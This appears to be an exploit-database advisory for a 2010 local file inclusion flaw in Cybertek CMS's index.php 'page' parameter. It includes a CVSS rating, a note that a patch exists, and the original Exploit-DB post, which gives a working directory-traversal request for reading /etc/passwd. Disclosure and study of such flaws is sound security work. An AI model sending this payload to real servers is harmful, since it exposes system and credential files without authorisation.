Cybertek CMS Local File Include Vulnerability

vendor:

Cybertek CMS

by:

Ashiyane Digital Security Team

7,5

CVSS

HIGH

Local File Include

CWE

Product Name: Cybertek CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Cybertek CMS Local File Include Vulnerability

A vulnerability in Cybertek CMS allows an attacker to include a local file on the server via the 'page' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

=======================================================
Cybertek CMS Local File Include Vulnerability
=======================================================
########################################
# Name: Cybertek CMS Local File Include Vulnerability
# Vendor: www.cybertek.co.za
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Vulnerability:

[+] Exploit: www.Site.com/[path]/index.php?page=[LFI]

[+] Demo: http://server/index.php?page=../../../../../../../../../../../etc/passwd


[+] Done ... ! :))

########################################